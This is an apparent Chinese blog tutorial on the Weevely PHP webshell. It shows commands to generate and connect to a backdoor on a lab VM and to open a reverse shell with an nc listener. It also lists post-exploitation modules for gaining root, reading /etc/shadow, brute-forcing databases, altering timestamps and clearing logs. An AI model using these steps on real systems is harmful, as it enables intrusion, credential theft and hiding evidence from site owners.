Weevely使用

前言

  在目前的后门生成工具中,最常用的就是MSF和CobaltStrike了。weevely人称Linux中的菜刀,相比于前两者,最主要的是操作比较简单,接下来简单介绍一下。

基本用法

[+] Run terminal or command on the target    //连接后门
    weevely <URL> <password> [cmd]

[+] Recover an existing session
    weevely session <path> [cmd]

[+] Generate new agent              //生成后门
    weevely generate <password> <path>

后门生成

weevely generate <password> <path>

  生成一个后门

后门连接

  这里我使用的是kali的虚拟机,将后门文件放到了kali的80端口上

  使用weevely进行连接

weevely http://192.168.80.131/u.php nuist

   成功连接上后门,获得虚拟终端

weevely模块介绍

 :shell_su                   #通过更变使用者来执行shell命令,可以获得root权限来执行命令.                                     
 :shell_sh                    #执行 shell 命令.                                             
 :shell_php                   #执行 PHP 命令.                                                
 :system_extensions            #收集PHP和webserver扩展列表                           
 :system_info                  #收集系统信息                                          
 :system_procs                 #列出正在运行的进程                                              
 :audit_disablefunctionbypass  #使用mod_cgi和.htaccess绕过系统禁用函数的限制。它会上传.htaccess和CGI脚本,并在远程服务器上运行伪系统shell     
 :audit_etcpasswd              #查看/etc/passwd文件                           
 :audit_suidsgid               #查找带有SUID或SGID标志的文件。                                  
 :audit_phpconf                #查看php配置信息                                             
 :audit_filesystem             #审核文件系统的弱权限。枚举各种系统目录并寻找可读写执行的目录,模块仅默认搜索部分linux下的常见目录,logs、root、home等                         
 :backdoor_reversetcp          #执行反向TCP shell. 需要nc -lvp <port>监听                                        
 :backdoor_tcp                # 在TCP端口上生成shell                                         
 :net_scan                     #TCP端口扫描.                                                       
 :net_mail                     #发送邮件.                                                           
 :net_ifconfig                 #获取网络接口地址.                                    
 :net_curl                     #执行类似curl的HTTP请求.                                    
 :net_proxy                    #运行本地代理以通过目标转移HTTP / HTTPS浏览 
 :net_phpproxy                 #在目标上安装PHP代理.                                     
 :bruteforce_sql               #可用来猜解数据库密码.                                             
 :file_find                    #查找具有给定名称和属性的文件.                          
 :file_download                #从远程文件系统下载文件.                                
 :file_check                   #获取文件的属性和权限.                            
 :file_touch                   #更改文件时间戳.                                               
 :file_cd                      #更改当前工作目录.                                    
 :file_grep                    #打印与多个文件中的模式匹配的行.                    
 :file_gzip                    #压缩或解压gzip文件.                                       
 :file_tar                     #压缩或解压tar文件.                                     
 :file_enum                    #检查路径列表的存在和权限
 :file_bzip2                   #压缩或解压bzip2文件.                                      
 :file_mount                   #使用HTTPfs挂载远程文件系统.                                
 :file_clearlog                #从文件中删除字符串.                                           
 :file_zip                     #压缩或解压zip文件.                                        
 :file_cp                      #复制单个文件.                                                    
 :file_upload2web              #自动将文件上传到Web文件夹并获取相应的URL. 
 :file_edit                    #在本地编辑器上编辑远程文件.                                  
 :file_read                    #从远程文件系统中读取远程文件.                         
 :file_webdownload             #指定URL下载文件.                                                     
 :file_upload                  #文件上载到远程文件系统.                                    
 :file_ls                      #列出目录内容.                                              
 :file_rm                      #删除远程文件.                                                  
 :sql_dump                     #Multi dbms mysqldump replacement.                                    
 :sql_console                  #执行SQL查询或运行sql控制台. 

   简单介绍几个模块

:system_info模块

  收集系统信息,直接:system_info列出全部信息

   包括攻击者当前用户身份,后门位置,攻击者ip等等

:shell_su模块

  该模块需要root用户的密码,和需要执行的命令,一般用法为

:shell_su  -user root  <密码>  <要执行的命令>

  通过更变使用者来执行shell命令,可以获得root权限来执行命令。如一般情况下,/etc/shadow这个文件普通用户是不能查看的,需要升级为root用户,就可以这样:

:audit_etcpasswd模块

  该模块的作用就是直接查看/etc/passwd

:backdoor_reversetcp模块

  执行反向TCP shell. 需要nc -lvp <port>监听

  weevely中执行

:backdoor_reversetcp <ip> <port>

  

   即可获得tcp反弹shell

posted @ 2021-12-09 11:39  小小小怪将军  阅读(682)  评论(0编辑  收藏  举报